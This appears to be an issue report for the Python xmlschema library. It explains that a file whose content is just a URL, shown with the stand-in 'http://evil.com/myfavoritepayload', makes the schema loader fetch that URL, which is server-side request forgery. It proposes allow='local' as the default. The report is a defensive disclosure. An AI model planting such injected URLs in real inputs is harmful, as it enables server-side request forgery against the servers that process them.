Description
Today, the XMLResource object source can be a remote URL, local URL, file path, or string literal. When loaded, the XMLResource tries to parse the given source first as a URL, then as a Path (local file), then as a string literal*.
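The resolution order described above can be illustrated with a small standard-library sketch. `classify_source` is a hypothetical helper written only for this issue; it is not part of xmlschema, and the library's actual checks may differ in detail. It only shows why a string that happens to look like a URL never reaches the "string literal" branch.

```python
from pathlib import Path
from urllib.parse import urlsplit


def classify_source(source: str) -> str:
    """Hypothetical illustration of a URL-first, path-second, literal-last loader.

    This is NOT xmlschema's implementation, only a sketch of the order
    described in this issue.
    """
    text = source.strip()

    # Step 1: anything that parses as a remote URL wins.
    try:
        parts = urlsplit(text)
    except ValueError:
        parts = None
    if parts is not None and parts.scheme in ("http", "https", "ftp") and parts.netloc:
        return "remote-url"

    # Step 2: an existing local file is treated as a path.
    try:
        if Path(text).is_file():
            return "local-path"
    except (OSError, ValueError):
        # Very long or otherwise invalid "paths" (e.g. a whole XML document)
        pass

    # Step 3: everything else is treated as literal content.
    return "literal"


print(classify_source("http://evil.com/myfavoritepayload"))  # remote-url
print(classify_source("<xs:schema xmlns:xs='http://www.w3.org/2001/XMLSchema'/>"))  # literal
```

The point of the sketch is that the caller's intent ("this is file content") is never consulted; only the shape of the string decides which branch runs.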
The new-user documentation on "Create a schema instance" does not mention this behavior except for the section "Creating a local copy of a remote XSD schema for offline use." The "Validation" documentation is similar.
A user may, roughly following the documentation, write the following:
import xmlschema
with open('local.xsd', 'r') as infile:
    data = infile.read()
xmlschema.XMLSchema(data)

If local.xsd is indeed an XSD file, we have no problem. However, imagine local.xsd comes from an untrusted location. If a malicious actor could set the content of local.xsd to:
http://evil.com/myfavoritepayload
Then calling xmlschema.XMLSchema() will make an HTTP GET request to that URL. This is Server-Side Request Forgery (SSRF).
This can be mitigated by using the allow setting:
import xmlschema
with open('local.xsd', 'r') as infile:
    data = infile.read()
resource = xmlschema.XMLResource(
    source=data,
    allow='local',
)
xmlschema.XMLSchema(resource)

However, the default behavior has allow='all'.
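For callers who read untrusted content themselves, one additional defensive step could be to reject anything that does not look like XML markup before it reaches the loader. The sketch below uses only the standard library; `ensure_xml_literal` is a hypothetical helper name, and the check is an assumption about what "looks like XML" should mean here, not something xmlschema provides. It is a complement to allow='local', not a replacement for it.

```python
def ensure_xml_literal(data: str) -> str:
    """Hypothetical pre-check: accept only content that starts with XML markup.

    Raises ValueError for content such as a bare URL or a file path, which a
    URL-first loader could otherwise interpret as a location to fetch.
    """
    # Ignore a leading byte-order mark and whitespace before the first tag.
    stripped = data.lstrip("\ufeff \t\r\n")
    if not stripped.startswith("<"):
        raise ValueError("content does not look like an XML document")
    return data


# Usage: well-formed-looking content passes through unchanged,
# while a bare URL is rejected before any loader sees it.
ensure_xml_literal("<xs:schema xmlns:xs='http://www.w3.org/2001/XMLSchema'/>")
try:
    ensure_xml_literal("http://evil.com/myfavoritepayload")
except ValueError as exc:
    print(f"rejected: {exc}")
```

This only guards the top-level source string; it does not address remote locations referenced from inside an otherwise valid schema, which is another reason a restrictive default would be preferable.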
Would you consider changing the default to allow='local' and releasing a new major version? I understand this would be a breaking change for end users, but I believe the pain of upgrading to a new major version is worth mitigating the risk of this default.
*Technically there is additional complexity with bytes-like and StringIO-like objects but that is not relevant for this discussion.